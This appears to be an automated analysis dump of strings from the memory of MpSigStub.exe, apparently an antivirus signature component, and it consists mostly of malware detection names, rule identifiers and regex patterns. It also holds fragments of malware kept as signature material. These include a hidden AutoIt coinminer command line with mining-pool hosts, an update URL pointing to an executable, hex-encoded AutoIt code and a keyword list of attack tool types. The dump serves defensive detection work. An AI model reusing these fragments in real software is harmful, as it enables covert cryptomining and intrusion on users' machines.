Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $sservicename = "tvnserver"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: opt ( "trayiconhide" , 0 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \webhelper.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0-o strat
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ://xmr.2miners.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ://randomxmonero.usa-east.nicehash.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ( "6c6c5374727563744765745074722824744275666629290x446c6c5374727563744372656174652822627974655b222026202469506c61696e54657874536
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ( "666292c202264776f7264222c2031290x446c6c43616c6c2824646c6c68616e646c652c2022626f6f6c222c202243727970744861736844617461222c2022
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ( "6c222c204578656375746528225472756522292c202264776f7264222c20302c20227374727563742a222c20
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:lastfolder
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %s%s!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: :longfolder
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojan:script/userexecution.a!amsi
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojan:script/userexecution.a!amsiobmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 48db3ab350cd5
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1d5b3942ec61c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: susptool_
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:colisicomponent
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: appdatafr3.bin
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 15b362aecaba
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: db78cc5e9b0b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dbb38de769be
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#context:softwarebundler:win32/installmonster.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: (.+)%(.%).exe$
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: (.+).exe$
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 4cb382521bf6
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: &\\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \\.\pipe\mpvsocket
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \clickonceforgooglechrome.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \evolvecontactagent.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:contextdataprocessname2
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:contextdataprocessname2obmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfilecontextdatapresent
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfileforcreatingprocess
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7378b0f18dd3
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:autoitcustomlastsec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#jenxcusbase64deobfuscator
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#jenxcusbase64deobfuscatorobmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e"[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: [jxs64]
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/gatak.eg!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ?\appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \%d+%.exe$
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: aa785fa688b6
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: cmd /c tas
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 95b39109a48a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:cobmetloader.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:cobmetloader.aobmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:contextpeadminshare.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: c:\windows
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:contextpeadminshare.a1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 69b3eccf1b7a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: qddddn;222s;222suddddod
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: meu\fddddz9\dddnmnddddsdfgiuddd3{hftdddr{hfdddf\irddddlmgddddfj\fddh
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7tdddnuinddd4qkeddtn:uddd;eifldddddd6l}222iv7ddddjdlpddddzlrjddddlle
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: qdd\kmfvvhddtdddddwdjdzpeddrfeddzi<qjdd\kmfvlqdrledddddjmfhddd[vqdd\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: djodd;22ddddhddddpddttyw
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: djodd;22ddddhddddpddttywx
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#trojan:msil/remloader!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dd"!#trojan:msil/remloader!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: {11111-22222-10009-11112}
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: {11111-22222-50001-00000}
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: filestream
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: filemode
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: fileshare
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: get_discretionaryacl
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rawacl
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: wellknownsidtype
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: aceflags
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: set_useshellexecutex
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alfper:trojan:win32/emaster.a!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\urob
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ros\emaster\log_f
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %s/%s%04u%0
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: u%02u.log
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\uroboro
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \emaster\my_console_
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $id: emaster_crypt.c 583
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 2007-04-13 09:38:10z vlad $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\uroboros
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster\emaster_crypt.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $id: qio_win32.c 549
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 2007-02-26 10:01:38z gilg $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ros\queue\drivers\qio_win32.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $id: qm.c 14872
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 010-12-17 14:02:22z gilg $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: roboros\queue\qm.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: auto_optimiz
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: event_init
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: auto_opitmize t
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: read_create
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: roboros\emaster\_bin\emaster\win32_debug\emas
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: er.pdb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_sess
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: on_destroy
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: on_create
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_clo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e_socket
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_gro
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: p_clear
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_st
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rt_group
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_is
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: group_mode
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_ses
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ion_set_path
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_free_
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: md_result
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_del
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ion_exec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ncel_exec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_g
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: t_globals
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#app:coinminer32:nicehashminer
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: config file is differs from version of nicehashminer... creating backup archive
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: a re-download of nicehash miner
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: might be needed.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: unable to get nicehash profitability data. if you are connected to internet, try again later.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: do not use our services or download or use the nicehash mining software.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: zrecommended amd gpu driver version is 15.7.1.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: nconfig file is from an older version of nicehashminer..
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: n[not compatible. update nicehash miner]x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:virtool:msil/lore!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "!#tel:virtool:msil/lore!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: {11111-22222-50001-00002}x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#trojan:win32/susdbg.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: obfuscat
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: njrat
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rootkit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: bootkit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: schost
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dropper
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: zombie
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: flood
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: wiper
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lolbin
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:virtool:win32/ascurlexe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:trojandownloader:win32/rottentu.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %s\ucv\ucv.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_init
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_exec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_file
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_filex
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/foxiebro.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:virtool:win32/obfuscator_sirefef_d
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:trojandownloader:win32/hormelex.b3
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /protect.org.br/phpmailer_5.2.1/test_script/styles/global.zip
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /protect.org.br/phpmailer_5.2.1/test_script/styles/global.zipx
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/falsecobra.b!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /commands/@slp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /commands/cmd
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return code %d
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/@name
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/@group
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/@version
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/proxy
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/proxy/@name
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/proxy/@password
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server[@current='true']
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server/@current[text()='true']
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server[text()='%s']/@current
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server[%d]
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/storage
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/check
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/interval
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: stg%02d.cab
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 8ivbscriptwww
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: reportdirwww
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: xcfgpathw
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: created by midl version 7.00.0555 at thu apr 12 10:40:03 2018
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: windows check av servicex
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alfper:trojan:win32/fusiondrive.x!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: access_to_cfg_gp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: cfg_access
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: networkgp.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: access_to_cfg_nb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: gpdcount.php?
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: feedbak_computeckey_saveregstrvalues_error
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: start_downloadexecuteupdater
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: adshow.php?ver=%s&subid=%s&mac=%s
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: start_computeckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: computeckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ret0compckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ret1compckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: files required by gabpath have been removed.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:base64encodefunctionmonitorw
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#fakecert!metpca2018
